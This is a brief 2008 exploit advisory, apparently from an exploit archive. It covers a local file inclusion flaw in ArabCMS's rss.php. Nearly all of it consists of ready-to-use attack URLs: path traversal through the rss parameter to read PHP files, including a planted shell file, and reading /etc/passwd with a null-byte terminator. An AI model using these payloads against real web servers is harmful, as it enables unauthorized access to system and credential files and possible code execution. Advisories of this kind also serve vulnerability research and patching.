id: 3803
date: 09/28/2008
title: ArabCMS (rss.php rss) Local File Inclusion Vulnerability
author: JiKo
cves: 

========================================================
ArabCMS (rss.php rss) Local File Inclusion Vulnerability
========================================================


####################################################################################
######              Local File Inclusion Vulnerabilities                       #####
###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip             #####
###### author : JIKO                                                           #####
###### foor read a php file >     ?rss=[name of file iwthout php]              #####
###### for execute exploit does not write extention of file                    #####
######                                                                         #####
######                                                                         #####
###### exploit : /Script/rss.php?rss=../[name of file wthout php]              #####
######                                                                         #####
###### example : /Script/rss.php?rss==/home/user/shell                         #####
######                                                                         #####
###### other files:        rss=../../../../etc/passwd%00                       #####
####################################################################################




#  0day.today [2023-03-22]  #